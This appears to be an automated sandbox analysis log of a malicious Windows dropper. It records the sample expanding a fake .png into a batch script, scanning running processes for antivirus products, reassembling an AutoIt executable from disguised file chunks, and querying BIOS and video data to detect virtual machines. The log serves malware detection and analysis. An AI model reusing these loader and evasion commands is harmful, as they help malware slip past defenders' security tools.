Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 362398
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Peterson.png
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "loops" Lost
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 362398\Print.com + Pounds + Lyrics + Msg + Blvd + Inserted + Comparison + Machinery + Olympus + Isaac + Withdrawal 362398\Print.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Based.png + ..\Facilities.png + ..\Christopher.png + ..\Page.png + ..\Trailers.png + ..\Seminars.png + ..\Sims.png t
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\362398\Print.com Print.com t
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\SysWOW64\tasklist.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Labeled.png Labeled.png.bat & Labeled.png.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\expand.exe expand Labeled.png Labeled.png.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 362398	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Peterson.png	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "loops" Lost	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 362398\Print.com + Pounds + Lyrics + Msg + Blvd + Inserted + Comparison + Machinery + Olympus + Isaac + Withdrawal 362398\Print.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Based.png + ..\Facilities.png + ..\Christopher.png + ..\Page.png + ..\Trailers.png + ..\Seminars.png + ..\Sims.png t	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\362398\Print.com Print.com t	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Static file information: File size 70254595 > 1048576

Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\362398\Print.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\362398\Print.com

Jump to dropped file

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\362398\Print.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\362398\Print.com

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\362398\Print.com TID: 7564	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\362398\Print.com TID: 7804	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\362398\Print.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\362398	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\362398\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\362398\Print.com

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Labeled.png Labeled.png.bat & Labeled.png.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\expand.exe expand Labeled.png Labeled.png.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 362398	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Peterson.png	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "loops" Lost	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 362398\Print.com + Pounds + Lyrics + Msg + Blvd + Inserted + Comparison + Machinery + Olympus + Isaac + Withdrawal 362398\Print.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Based.png + ..\Facilities.png + ..\Christopher.png + ..\Page.png + ..\Trailers.png + ..\Seminars.png + ..\Sims.png t	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\362398\Print.com Print.com t	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: Print.com, 00000011.00000000.1269719932.00000000005B3000.00000002.00000001.01000000.0000000A.sdmp, Isaac.10.dr, Print.com.2.dr

Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning

Source: C:\Users\user\AppData\Local\Temp\362398\Print.com

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

